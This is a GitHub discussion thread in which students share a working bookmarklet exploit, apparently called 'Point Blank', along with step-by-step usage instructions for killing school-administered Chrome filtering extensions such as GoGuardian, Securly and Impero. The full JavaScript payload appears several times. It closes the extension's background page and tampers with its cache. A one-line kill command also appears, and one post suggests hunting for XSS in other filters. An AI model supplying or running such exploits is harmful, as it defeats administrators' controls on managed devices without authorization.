### DISCUSSION TITLE
Comeback exploit!

### DISCUSSION THREAD

**Discussion by Aka-but-nice** [3kh0/ext-remover#347] [Fixes JOIN TITANIUM NETWORK TO SHARE PLEASE]
@3kh0 put this on your ext-remover. Steps: bookmark the code in this site, https://melon-evening-textbook.glitch.me/ then go to a new tab press the bookmarklet and press "Pick a link and use the bookmarklet" and go the the extension site your school uses then press the button that's there and it should open a about:blank tab once that happens press the bookmarklet again and click either hard disable, or soft disable, hard disable turns off your extension until you literally powerwash and soft disable turns it off until you restart. Credit to SprinksMC on discord aka Bypassi. Also if it says "blocked by chrome" reload or just use it in a new tab.

**Comment by Theblackmamba824** [comment]
unsafe

**Reply by Aka-but-nice** [reply]
eval

**Comment by 3kh0** [comment]
@Aka-unblock please provide where this exploit was

**Reply by Aka-but-nice** [reply]
@3kh0 The Titanium Network Discord, also if you need documentation ill make a video, explaining what you have to do

**Reply by Aka-but-nice** [reply]
This is actually the updated point blank

**Reply by Aka-but-nice** [reply]
Bonus: heres a exploit that works. Go to this link https://stream-mysterious-bathroom.glitch.me/
bookmark the code there then go to tinyurl.com/goofcurly if you have securly, tinyurl.com/goofguardian if you have goguardian, tinyurl.com/goofsi if you have blocksi, tinyurl.com/goofclassroom if you have securly classroom, each of the links have a button on the pages and each open a about:blank tab click on the bookmarklet you created

**Reply by that1kidd0** [reply]
@Aka-unblock for lightspeed it dont work, please fix it, also this link [https://https://melon-evening-textbook.glitch.me/](https://https//melon-evening-textbook.glitch.me/) dont work either , and the bookmarklet I made does nothing, I have lightspeed so try and fix it please

**Reply by Aka-but-nice** [reply]
Here, tinyurl.com/goofumbrella also if it says blocked by chrome, reload

**Reply by that1kidd0** [reply]
@Aka-unblock i have lightspeed what do I do ?

**Reply by Aka-but-nice** [reply]
go to melon-evening-textbook.glitch.me

**Reply by Aka-but-nice** [reply]
I'll say it again, for this to work, you have to go to the link of your blocker page, which is stated at the top if you have securly go to  tinyurl.com/goofcurly and tinyurl.com/goofguardian if you have GoGuardian, and etc. Then click on whatever button you see on the page if the button opens a blank page, your doing it right, then press the bookmarklet and press soft kill(recommended) or hard kill, if you hate school, like really bad.

**Reply by that1kidd0** [reply]
@Aka-unblock whats the link for lightspeed ?

**Reply by AdanGonz2444** [reply]
Would it also work for content Keeper?

**Reply by Arthura0121** [reply]
@Aka-unblock the thing is, the tinyurl for goguardian doesn't work. What I mean is whenever I go to that link, it show me a page with this text: Your file couldn’t be accessedIt may have been moved, edited, or deleted.
ERR_FILE_NOT_FOUND
Pls pls pls help me cuz I honestly don't know what to do 😭

**Reply by Aka-but-nice** [reply]
Yea your school updated goguardian it doesn't work anymore, sorry even if I finish ingot for 106 or higher it wouldn't work

**Reply by Christian32307** [reply]
dang mine too
this is cool though nice job

**Reply by Aka-but-nice** [reply]
Yea, good thing I got securly, hopefully a new exploit comes out.

**Reply by GlizxyBoi** [reply]
> Yea your school updated goguardian it doesn't work anymore, sorry even if I finish ingot for 106 or higher it wouldn't work

wait so theres now way for 106 and above?

**Reply by Aka-but-nice** [reply]
No but im working on one, do you have goguardian

**Reply by GlizxyBoi** [reply]
> No but im working on one, do you have goguardian

yeah i have goguardian it sucks

**Reply by GlizxyBoi** [reply]
> No but im working on one, do you have goguardian

wait is there noway for versions 106 and above???

**Reply by SlitheringLizard1** [reply]
ayo wut

**Reply by S-PScripts** [reply]
> (Lick,Lick) (Don't ban me) https://github.com/Exploit-Master12/Linuxkill

join our discord

**Reply by S-PScripts** [reply]
> I Can't! Can you join a Google classroom account that I made? Join the chat instead! The class code is: ituwhxn The invite link is https://classroom.google.com/c/NzU0NTQzMDMwNTU1?cjc=ituwhxn Please join!!! (Do not leak my name if you see it) I do not have a discord account. Also,can you give me your email adress to add to the classroom?

No.
You can either make an account to join the discord or stay on the inactive 3kh0 discussions.

**Reply by S-PScripts** [reply]
> =-( What is the invite?

https://github.com/3kh0/ext-remover/discussions/1532

**Comment by Aka-but-nice** [comment]
sorry, I meant to put https://melon-evening-textbook.glitch.me

**Reply by that1kidd0** [reply]
link for lightspeed ?

**Reply by Aka-but-nice** [reply]
@that1kidd0 tinyurl.com/goofspeed

**Reply by Aka-but-nice** [reply]
Did it work

**Reply by that1kidd0** [reply]
no it didnt
![image](https://user-images.githubusercontent.com/120291367/210281049-f6f38da5-74ce-4f02-950d-cca64eb5923d.png)

**Reply by that1kidd0** [reply]
@Aka-unblock

**Reply by Aka-but-nice** [reply]
@that1kidd0 Sorry, but there's not one for lightspeed, I will make sure to look into it. Expect a update tomorrow.

**Reply by that1kidd0** [reply]
thanks dude!!

**Reply by that1kidd0** [reply]
@Aka-unblock You found for lightspeed yet I've been waiting

**Reply by Aka-but-nice** [reply]
sorry, but there's not one

**Comment by 3kh0** [comment]
Code:
```js
javascript:function aboutBlankPage(n){opener.chrome.tabs.query({url:n},(n=>{opener.chrome.tabs.update(n[0].id,{url:"about:blank"})}))}function get(n){return window.document.getElementById(n)}doc=window.document,doc.write("\n<html>\n<style>\nhtml, body {\n  height: 100%;\n  width: 100%;\n}\nh1,p {\nfont-family: system-ui,-apple-system,system-ui,\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n}\np {\nfont-size: 16;\n}\nbutton {\n  align-items: center;\n  background-color: #FFFFFF;\n%20%20border:%201px%20solid%20rgba(0,%200,%200,%200.1);\n%20%20border-radius:%20.25rem;\n%20%20box-shadow:%20rgba(0,%200,%200,%200.02)%200%201px%203px%200;\n%20%20box-sizing:%20border-box;\n%20%20color:%20rgba(0,%200,%200,%200.85);\n%20%20cursor:%20pointer;\n%20%20display:%20inline-flex;\n%20%20font-family:%20system-ui,-apple-system,system-ui,\%22Helvetica%20Neue\%22,Helvetica,Arial,sans-serif;\n%20%20font-size:%2016px;\n%20%20font-weight:%20600;\n%20%20justify-content:%20center;\n%20%20line-height:%201.25;\n%20%20margin:%200;\n%20%20min-height:%203rem;\n%20%20padding:%20calc(.875rem%20-%201px)%20calc(1.5rem%20-%201px);\n%20%20position:%20relative;\n%20%20text-decoration:%20none;\n%20%20transition:%20all%20250ms;\n%20%20user-select:%20none;\n%20%20-webkit-user-select:%20none;\n%20%20touch-action:%20manipulation;\n%20%20vertical-align:%20baseline;\n%20%20width:%20auto;\n}\n\nbutton:hover,\nbutton:focus%20{\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.1)%200%204px%2012px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n}\n\nbutton:hover%20{\n%20%20transform:%20translateY(-1px);\n}\n\nbutton:active%20{\n%20%20background-color:%20#F0F0F1;\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.06)%200%202px%204px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n%20%20transform:%20translateY(0);\n}\ninput%20{\nheight:16;\nborder:%200;\n%20%20border-bottom:%202px%20solid%20#9b9b9b;\n%20%20outline:%200;\n}\n#opener%20{\ncursor:%20pointer;\n}\n#links%20{\ndisplay:%20none;\n}\n%3C/style%3E\n%3Cbody%3E\n%3Ch1%3EPoint%20Blank%20Swap%20Launcher%3C/h1%3E\n%3Cp%3EThis%20must%20be%20ran%20on%20an%20extension%20about:blank%20page%3C/p%3E\n%3Cp%20id='opener'%3ENeed%20the%20links?%20Click%20here%3C/p%3E\n%3Cdiv%20id='links'%3E\n%3Cp%3E%20List%20of%20links%20below%20%3Cbr%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofguardian'%3Egoguardian%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofcurly'%3Esecurly%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofumbrella'%3Ecisco%20umbrella%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofsi'%3Eblocksi%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofboss'%3Eiboss%3C/a%3E%3Cbr%3E\n%3C/p%3E\n%3C/div%3E\n%3Cbutton%20id='kill'%3EKill%20extension%20by%20killing%20process%3C/button%3E\n%3Cbutton%20id='cachekill'%3E[Securly%20only]%20Confuse%20by%20overwriting%20cache%3C/button%3E\n%3Cp%3EChange%20tabs%20with%20url%20to%20about:blank%20(make%20sure%20you%20know%20how%20to%20use%20this)%3C/p%3E\n%3Cinput%20id='url'%3E\n%3Cbutton%20id='change'%3EChange%20tabs%3C/button%3E\n%3Cp%20id='error'%3E%3C/p%3E\n%3Cbr%3E\n%3Cp%3E%3Ci%3EExpoit%20made%20by%20SprinkzMC#8421,%20Launcher%20made%20by%20NitrogenDioxide#2553%3C/i%3E%3C/p%3E\n%3C/body%3E\n%3C/html%3E\n%22),get(%22kill%22).addEventListener(%22click%22,(function(){opener.chrome.extension.getBackgroundPage().close(),alert(%22Killed%20background%20process%22)}),!1),get(%22change%22).addEventListener(%22click%22,(function(){aboutBlankPage(get(%22url%22).value)}),!1),get(%22cachekill%22).addEventListener(%22click%22,(function(){localStorage.cluster=%22UNKNOWN_SCHOOL,999999999999999999999999999%22,alert(%22Cache%20changed%22)}),!1),get(%22opener%22).addEventListener(%22click%22,(function(){const%20n=get(%22links%22);%22none%22!==n.style.display&&%22%22!=n.style.display?n.style.display=%22none%22:n.style.display=%22block%22}),!1);
```

**Reply by GlizxyBoi** [reply]
> Code:
> 
> ```js
> javascript:function aboutBlankPage(n){opener.chrome.tabs.query({url:n},(n=>{opener.chrome.tabs.update(n[0].id,{url:"about:blank"})}))}function get(n){return window.document.getElementById(n)}doc=window.document,doc.write("\n<html>\n<style>\nhtml, body {\n  height: 100%;\n  width: 100%;\n}\nh1,p {\nfont-family: system-ui,-apple-system,system-ui,\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n}\np {\nfont-size: 16;\n}\nbutton {\n  align-items: center;\n  background-color: #FFFFFF;\n%20%20border:%201px%20solid%20rgba(0,%200,%200,%200.1);\n%20%20border-radius:%20.25rem;\n%20%20box-shadow:%20rgba(0,%200,%200,%200.02)%200%201px%203px%200;\n%20%20box-sizing:%20border-box;\n%20%20color:%20rgba(0,%200,%200,%200.85);\n%20%20cursor:%20pointer;\n%20%20display:%20inline-flex;\n%20%20font-family:%20system-ui,-apple-system,system-ui,\%22Helvetica%20Neue\%22,Helvetica,Arial,sans-serif;\n%20%20font-size:%2016px;\n%20%20font-weight:%20600;\n%20%20justify-content:%20center;\n%20%20line-height:%201.25;\n%20%20margin:%200;\n%20%20min-height:%203rem;\n%20%20padding:%20calc(.875rem%20-%201px)%20calc(1.5rem%20-%201px);\n%20%20position:%20relative;\n%20%20text-decoration:%20none;\n%20%20transition:%20all%20250ms;\n%20%20user-select:%20none;\n%20%20-webkit-user-select:%20none;\n%20%20touch-action:%20manipulation;\n%20%20vertical-align:%20baseline;\n%20%20width:%20auto;\n}\n\nbutton:hover,\nbutton:focus%20{\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.1)%200%204px%2012px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n}\n\nbutton:hover%20{\n%20%20transform:%20translateY(-1px);\n}\n\nbutton:active%20{\n%20%20background-color:%20#F0F0F1;\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.06)%200%202px%204px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n%20%20transform:%20translateY(0);\n}\ninput%20{\nheight:16;\nborder:%200;\n%20%20border-bottom:%202px%20solid%20#9b9b9b;\n%20%20outline:%200;\n}\n#opener%20{\ncursor:%20pointer;\n}\n#links%20{\ndisplay:%20none;\n}\n%3C/style%3E\n%3Cbody%3E\n%3Ch1%3EPoint%20Blank%20Swap%20Launcher%3C/h1%3E\n%3Cp%3EThis%20must%20be%20ran%20on%20an%20extension%20about:blank%20page%3C/p%3E\n%3Cp%20id='opener'%3ENeed%20the%20links?%20Click%20here%3C/p%3E\n%3Cdiv%20id='links'%3E\n%3Cp%3E%20List%20of%20links%20below%20%3Cbr%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofguardian'%3Egoguardian%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofcurly'%3Esecurly%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofumbrella'%3Ecisco%20umbrella%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofsi'%3Eblocksi%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofboss'%3Eiboss%3C/a%3E%3Cbr%3E\n%3C/p%3E\n%3C/div%3E\n%3Cbutton%20id='kill'%3EKill%20extension%20by%20killing%20process%3C/button%3E\n%3Cbutton%20id='cachekill'%3E[Securly%20only]%20Confuse%20by%20overwriting%20cache%3C/button%3E\n%3Cp%3EChange%20tabs%20with%20url%20to%20about:blank%20(make%20sure%20you%20know%20how%20to%20use%20this)%3C/p%3E\n%3Cinput%20id='url'%3E\n%3Cbutton%20id='change'%3EChange%20tabs%3C/button%3E\n%3Cp%20id='error'%3E%3C/p%3E\n%3Cbr%3E\n%3Cp%3E%3Ci%3EExpoit%20made%20by%20SprinkzMC#8421,%20Launcher%20made%20by%20NitrogenDioxide#2553%3C/i%3E%3C/p%3E\n%3C/body%3E\n%3C/html%3E\n%22),get(%22kill%22).addEventListener(%22click%22,(function(){opener.chrome.extension.getBackgroundPage().close(),alert(%22Killed%20background%20process%22)}),!1),get(%22change%22).addEventListener(%22click%22,(function(){aboutBlankPage(get(%22url%22).value)}),!1),get(%22cachekill%22).addEventListener(%22click%22,(function(){localStorage.cluster=%22UNKNOWN_SCHOOL,999999999999999999999999999%22,alert(%22Cache%20changed%22)}),!1),get(%22opener%22).addEventListener(%22click%22,(function(){const%20n=get(%22links%22);%22none%22!==n.style.display&&%22%22!=n.style.display?n.style.display=%22none%22:n.style.display=%22block%22}),!1);
> ```

what the code for and how to do it

**Reply by GlizxyBoi** [reply]
> Code:
> 
> ```js
> javascript:function aboutBlankPage(n){opener.chrome.tabs.query({url:n},(n=>{opener.chrome.tabs.update(n[0].id,{url:"about:blank"})}))}function get(n){return window.document.getElementById(n)}doc=window.document,doc.write("\n<html>\n<style>\nhtml, body {\n  height: 100%;\n  width: 100%;\n}\nh1,p {\nfont-family: system-ui,-apple-system,system-ui,\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n}\np {\nfont-size: 16;\n}\nbutton {\n  align-items: center;\n  background-color: #FFFFFF;\n%20%20border:%201px%20solid%20rgba(0,%200,%200,%200.1);\n%20%20border-radius:%20.25rem;\n%20%20box-shadow:%20rgba(0,%200,%200,%200.02)%200%201px%203px%200;\n%20%20box-sizing:%20border-box;\n%20%20color:%20rgba(0,%200,%200,%200.85);\n%20%20cursor:%20pointer;\n%20%20display:%20inline-flex;\n%20%20font-family:%20system-ui,-apple-system,system-ui,\%22Helvetica%20Neue\%22,Helvetica,Arial,sans-serif;\n%20%20font-size:%2016px;\n%20%20font-weight:%20600;\n%20%20justify-content:%20center;\n%20%20line-height:%201.25;\n%20%20margin:%200;\n%20%20min-height:%203rem;\n%20%20padding:%20calc(.875rem%20-%201px)%20calc(1.5rem%20-%201px);\n%20%20position:%20relative;\n%20%20text-decoration:%20none;\n%20%20transition:%20all%20250ms;\n%20%20user-select:%20none;\n%20%20-webkit-user-select:%20none;\n%20%20touch-action:%20manipulation;\n%20%20vertical-align:%20baseline;\n%20%20width:%20auto;\n}\n\nbutton:hover,\nbutton:focus%20{\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.1)%200%204px%2012px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n}\n\nbutton:hover%20{\n%20%20transform:%20translateY(-1px);\n}\n\nbutton:active%20{\n%20%20background-color:%20#F0F0F1;\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.06)%200%202px%204px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n%20%20transform:%20translateY(0);\n}\ninput%20{\nheight:16;\nborder:%200;\n%20%20border-bottom:%202px%20solid%20#9b9b9b;\n%20%20outline:%200;\n}\n#opener%20{\ncursor:%20pointer;\n}\n#links%20{\ndisplay:%20none;\n}\n%3C/style%3E\n%3Cbody%3E\n%3Ch1%3EPoint%20Blank%20Swap%20Launcher%3C/h1%3E\n%3Cp%3EThis%20must%20be%20ran%20on%20an%20extension%20about:blank%20page%3C/p%3E\n%3Cp%20id='opener'%3ENeed%20the%20links?%20Click%20here%3C/p%3E\n%3Cdiv%20id='links'%3E\n%3Cp%3E%20List%20of%20links%20below%20%3Cbr%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofguardian'%3Egoguardian%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofcurly'%3Esecurly%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofumbrella'%3Ecisco%20umbrella%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofsi'%3Eblocksi%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofboss'%3Eiboss%3C/a%3E%3Cbr%3E\n%3C/p%3E\n%3C/div%3E\n%3Cbutton%20id='kill'%3EKill%20extension%20by%20killing%20process%3C/button%3E\n%3Cbutton%20id='cachekill'%3E[Securly%20only]%20Confuse%20by%20overwriting%20cache%3C/button%3E\n%3Cp%3EChange%20tabs%20with%20url%20to%20about:blank%20(make%20sure%20you%20know%20how%20to%20use%20this)%3C/p%3E\n%3Cinput%20id='url'%3E\n%3Cbutton%20id='change'%3EChange%20tabs%3C/button%3E\n%3Cp%20id='error'%3E%3C/p%3E\n%3Cbr%3E\n%3Cp%3E%3Ci%3EExpoit%20made%20by%20SprinkzMC#8421,%20Launcher%20made%20by%20NitrogenDioxide#2553%3C/i%3E%3C/p%3E\n%3C/body%3E\n%3C/html%3E\n%22),get(%22kill%22).addEventListener(%22click%22,(function(){opener.chrome.extension.getBackgroundPage().close(),alert(%22Killed%20background%20process%22)}),!1),get(%22change%22).addEventListener(%22click%22,(function(){aboutBlankPage(get(%22url%22).value)}),!1),get(%22cachekill%22).addEventListener(%22click%22,(function(){localStorage.cluster=%22UNKNOWN_SCHOOL,999999999999999999999999999%22,alert(%22Cache%20changed%22)}),!1),get(%22opener%22).addEventListener(%22click%22,(function(){const%20n=get(%22links%22);%22none%22!==n.style.display&&%22%22!=n.style.display?n.style.display=%22none%22:n.style.display=%22block%22}),!1);
> ```

its not working for  me are you guys working on like ingot to disable exts?

**Comment by GlizxyBoi** [comment]
> @3kh0 put this on your ext-remover. Steps: bookmark the code in this site, https://https://melon-evening-textbook.glitch.me/ then go to a new tab press the bookmarklet and press "Pick a link and use the bookmarklet" and go the the extension site your school uses then press the button that's there and it should open a about:blank tab once that happens press the bookmarklet again and click either hard disable, or soft disable, hard disable turns off your extension until you literally powerwash and soft disable turns it off until you restart. Credit to SprinksMC on discord aka Bypassi. Also if it says "blocked by chrome" reload or just use it in a new tab.

cant u just do something like ingot

**Reply by Aka-but-nice** [reply]
Thas what I'm saying I'm making one rn with the same features that built for v106 and higher ofc but maybe not v 206

**Reply by GlizxyBoi** [reply]
> Thas what I'm saying I'm making one rn with the same features that built for v106 and higher ofc but maybe not v 206

ong fr

**Reply by GlizxyBoi** [reply]
> Does anyone want to help me with the ingot unblocker, my discord is Antoine

ill just wait till u done

**Reply by GlizxyBoi** [reply]
> alr

i would but my school has a AP next to me at all times its bad

**Reply by Aka-but-nice** [reply]
"ap"  what is that

**Reply by GlizxyBoi** [reply]
> "ap" what is that

assistant principal

**Reply by Aka-but-nice** [reply]
Alr

**Reply by GlizxyBoi** [reply]
> Thas what I'm saying I'm making one rn with the same features that built for v106 and higher ofc but maybe not v 206

hows the progress???

**Reply by Aka-but-nice** [reply]
> > Thas what I'm saying I'm making one rn with the same features that built for v106 and higher ofc but maybe not v 206
> 
> hows the progress???

Well, it's finished, however, it still won't work for GoGuardian, sorry.

**Reply by GlizxyBoi** [reply]
> > > Thas what I'm saying I'm making one rn with the same features that built for v106 and higher ofc but maybe not v 206
> > 
> > 
> > hows the progress???
> 
> Well, it's finished, however, it still won't work for GoGuardian, sorry.

dang it :(

**Reply by KJIsBetter** [reply]
does it work with lightspeed

**Comment by AdanGonz2444** [comment]
I don't have any of these is it possible for other things like Content keeper or impero or something idk how it works but maybe it also probably works for those? idk but if it's not possible can you tell me?

**Reply by Aka-but-nice** [reply]
Sorry but theres not one you would have to find XSS(Cross Site scripting) in impero or Content Keeper, here is where you can find that stuff  https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.google.com%2Fservice%2Fupdate2%2Fcrx%3Fresponse%3Dredirect%26os%3Dcros%26arch%3Dx86-64%26os_arch%3Dx86-64%26nacl_arch%3Dx86-64%26prod%3Dchromiumcrx%26prodchannel%3Dunknown%26prodversion%3D108.0.0.0%26acceptformat%3Dcrx2%2Ccrx3%26x%3Did%253Djdogphakondfdmcanpapfahkdomaicfa%2526uc   (Thats content keeper's code)  https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.google.com%2Fservice%2Fupdate2%2Fcrx%3Fresponse%3Dredirect%26os%3Dcros%26arch%3Dx86-64%26os_arch%3Dx86-64%26nacl_arch%3Dx86-64%26prod%3Dchromiumcrx%26prodchannel%3Dunknown%26prodversion%3D108.0.0.0%26acceptformat%3Dcrx2%2Ccrx3%26x%3Did%253Dpdmhilamamchgnnipghbjakjpbenbcdj%2526uc (Imperos code)

**Reply by Aka-but-nice** [reply]
> I don't have any of these is it possible for other things like Content keeper or impero or something idk how it works but maybe it also probably works for those? idk but if it's not possible can you tell me?

Yes, there is one for impero https://tinyurl.com/goofimpero

**Reply by JoeMheh** [reply]
> https://tinyurl.com/goofimpero

idk if it works for me cause I press disable yet I don't think it disabled I tried hard kill I also think it didn't do anything

**Reply by GlizxyBoi** [reply]
> > https://tinyurl.com/goofimpero
> 
> idk if it works for me cause I press disable yet I don't think it disabled I tried hard kill I also think it didn't do anything

yeah same don't work for me either

**Reply by Snipperrazer** [reply]
I need one content keeper

**Reply by Aka-but-nice** [reply]
> > https://tinyurl.com/goofimpero
> 
> idk if it works for me cause I press disable yet I don't think it disabled I tried hard kill I also think it didn't do anything

Yea, hard disable for impero doesn't work, try cache kill, or soft kill, hard kill is for Securly, I should have said that.

**Reply by Aka-but-nice** [reply]
> > https://tinyurl.com/goofimpero
> 
> idk if it works for me cause I press disable yet I don't think it disabled I tried hard kill I also think it didn't do anything

And, if that still doesn't work, click the link on that page, on the blank page it opens, use ```
javascript:opener.chrome.extension.getBackgroundPage().close();``` 
And make sure you actually have bookmarklets

**Reply by Snipperrazer** [reply]
> Sorry but theres not one you would have to find XSS(Cross Site scripting) in impero or Content Keeper, here is where you can find that stuff https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.google.com%2Fservice%2Fupdate2%2Fcrx%3Fresponse%3Dredirect%26os%3Dcros%26arch%3Dx86-64%26os_arch%3Dx86-64%26nacl_arch%3Dx86-64%26prod%3Dchromiumcrx%26prodchannel%3Dunknown%26prodversion%3D108.0.0.0%26acceptformat%3Dcrx2%2Ccrx3%26x%3Did%253Djdogphakondfdmcanpapfahkdomaicfa%2526uc (Thats content keeper's code) https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.google.com%2Fservice%2Fupdate2%2Fcrx%3Fresponse%3Dredirect%26os%3Dcros%26arch%3Dx86-64%26os_arch%3Dx86-64%26nacl_arch%3Dx86-64%26prod%3Dchromiumcrx%26prodchannel%3Dunknown%26prodversion%3D108.0.0.0%26acceptformat%3Dcrx2%2Ccrx3%26x%3Did%253Dpdmhilamamchgnnipghbjakjpbenbcdj%2526uc (Imperos code)

yea but I need explanation how to use it for content keeper thanks

**Reply by Aka-but-nice** [reply]
> > Sorry but theres not one you would have to find XSS(Cross Site scripting) in impero or Content Keeper, here is where you can find that stuff https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.google.com%2Fservice%2Fupdate2%2Fcrx%3Fresponse%3Dredirect%26os%3Dcros%26arch%3Dx86-64%26os_arch%3Dx86-64%26nacl_arch%3Dx86-64%26prod%3Dchromiumcrx%26prodchannel%3Dunknown%26prodversion%3D108.0.0.0%26acceptformat%3Dcrx2%2Ccrx3%26x%3Did%253Djdogphakondfdmcanpapfahkdomaicfa%2526uc (Thats content keeper's code) https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.google.com%2Fservice%2Fupdate2%2Fcrx%3Fresponse%3Dredirect%26os%3Dcros%26arch%3Dx86-64%26os_arch%3Dx86-64%26nacl_arch%3Dx86-64%26prod%3Dchromiumcrx%26prodchannel%3Dunknown%26prodversion%3D108.0.0.0%26acceptformat%3Dcrx2%2Ccrx3%26x%3Did%253Dpdmhilamamchgnnipghbjakjpbenbcdj%2526uc (Imperos code)
> 
> yea but I need explanation how to use it for content keeper thanks

Well, you can't

**Reply by Aka-but-nice** [reply]
Send content keeper's block page, would you?

**Reply by Snipperrazer** [reply]
> Send content keeper's block page, would you?

here https://ckr01.wfpsb.org/cgi-bin/blockpage/feliciana.cgi

**Reply by Snipperrazer** [reply]
> Send content keeper's block page, would you?

i just did patience is key

**Reply by AdanGonz244** [reply]
If a content keeper disable was made, would it work for all block pages because that blockage differs from my school's block page?

**Reply by Snipperrazer** [reply]
> If a content keeper disable was made, would it work for all block pages because that blockage differs from my school's block page?

 Probaly half and half its a very aggressive web filter and blocks you from wifi after searching something specific but yea it could  it should unblock all

**Reply by Snipperrazer** [reply]
> Send content keeper's block page, would you?

yelp waiting is key

**Reply by S-PScripts** [reply]
> Rickroll,anyone?

stfu and join our discord

**Comment by amelia-bartlett** [comment]


**Reply by Aka-but-nice** [reply]
As expected, it's fixed, at least I hope.

**Reply by Snipperrazer** [reply]
> As expected, it's fixed, at least I hope.

Hey still waiting on a response for the ck auth

**Reply by GlizxyBoi** [reply]
> As expected, it's fixed, at least I hope.

so is there a way to shut off goguardian?

**Reply by Aka-but-nice** [reply]
DM Me, "Aka, but nice#5094"

**Reply by GlizxyBoi** [reply]
> DM Me, "Aka, but nice#5094"

my friend said that if i use my own hotspot goguardian doesnt work is that true?

**Reply by siouxxsies** [reply]
> my friend said that if i use my own hotspot goguardian doesnt work is that true?

not true
GoGuardian is an extension, it has nothing to do with wifi.

**Comment by siouxxsies** [comment]
bookmarklets are blocked on my chromebook so how would this work?

**Reply by GlizxyBoi** [reply]
> bookmarklets are blocked on my chromebook so how would this work?

oof

**Reply by py660** [reply]
Have a data:url or a custom g-doc with ready-to-copy bookmarklet urls, and then simply paste them into the URL bar whever you want to use them

**Reply by siouxxsies** [reply]
> Have a data:url or a custom g-doc with ready-to-copy bookmarklet urls, and then simply paste them into the URL bar whever you want to use them

what is a data:url

**Reply by py660** [reply]
just like `javascript:`, a `data:` url is a way for browsers to display content which is provided in the url, which might be encoded with base64. Here's an example:
```
data:text/html,%3Ch1%3EHello%2C%20World%21%3C%2Fh1%3E
``` 
This shows a `text/html` page showing `Hello World!` in big text.

**Comment by SlitheringLizard1** [comment]
imma just

revive this post saying that I found a way to have tinyurl.com/goofguardian working again

instead of teacher/lesson-plans/blocked.html you remove teacher/lessson-plans/ and you change blocked.html to lock.html

it actually loaded when I did it but since I used extprint3r it didn't finish loading it just hung
imma do a bit of testing later

**Reply by SlitheringLizard1** [reply]
ok so I did that editing then forgor to post again, the button isn't freaking there. its just the block screen. can someone else help
